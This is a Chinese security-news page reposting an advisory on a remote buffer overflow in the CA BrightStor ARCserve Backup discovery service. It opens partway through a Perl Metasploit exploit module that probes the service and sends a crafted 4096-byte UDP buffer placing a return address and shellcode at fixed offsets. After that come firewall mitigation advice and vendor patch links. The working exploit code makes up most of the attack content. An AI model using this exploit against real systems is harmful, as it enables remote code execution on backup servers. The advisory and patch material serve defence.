CA BrightStor ARCserve Backup发现服务远程缓冲…
2008-04-10 03:03:48来源:互联网 阅读 ()
}
# Connection #2 should receive the hostname of the target
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("hMETA");
my $res = $s->Recv(-1, 1);
$s->Close;
if (! $res) {
$self->PrintLine("[*] The discovery service did not respond to our query");
return $self->CheckCode('Generic');
}
$self->PrintLine("[*] Discovery service active on host: $res");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
my $s = Msf::Socket::Udp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
my $bang = "X" x 4096;
# esp @ 971
# ret @ 968
# edi @ 1046
# end = 4092
substr($bang, 968, 4, pack('V', $target->[1]));
substr($bang, 1046, length($shellcode), $shellcode);
$self->PrintLine("[*] Sending " .length($bang) . " bytes to remote host.");
$s->Send($bang);
$s->Recv(-1, 5);
return;
}
1;
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 部署防火墙,访问控制列表或其他TCP/UDP限制机制,限制对系统和服务的访问.
厂商补丁:
Computer Associates
-------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://supportconnectw.ca.com/public/enews/BrightStor/brigcurrent.asp
现已发布以下厂商补丁:
BrightStor ARCserve Backup r11.1 for Windows -
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62769
BrightStor ARCserve Backup r11.0 for Windows -
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62768
BrightStor Enterprise Backup v10.5 for Windows -
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62770
BrightStor Enterprise Backup v10.0 for Windows -
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62771
BrightStor ARCserve Backup v9.01 for Windows -
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62767
BrightStor ARCserve 2000 Backup for Windows (日语版) -
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62766
BrightStor ARCserve Backup r11.1 for NetWare
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62936
BrightStor ARCserve Backup v9 for NetWare
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62772
BrightStor ARCserve Backup r11.1 for Windows - 64 Bit Edition -
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62990
BrightStor ARCserve Backup r11.0 for Windows - 64 Bit Edition -
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62989
BrightStor Enterprise Backup v10.5 for Windows - 64 Bit Edition -
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62991
BrightStor ARCserve Backup v9.01 for Windows - 64 Bit Edition -
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO62987
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇:pMachine
- CA BrightStor ARCserve Backup UniversalAgent缓冲区溢出漏 2008-04-09
- CA BrightStor ARCserve Backup远程缓冲区溢出漏洞 2008-04-10
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
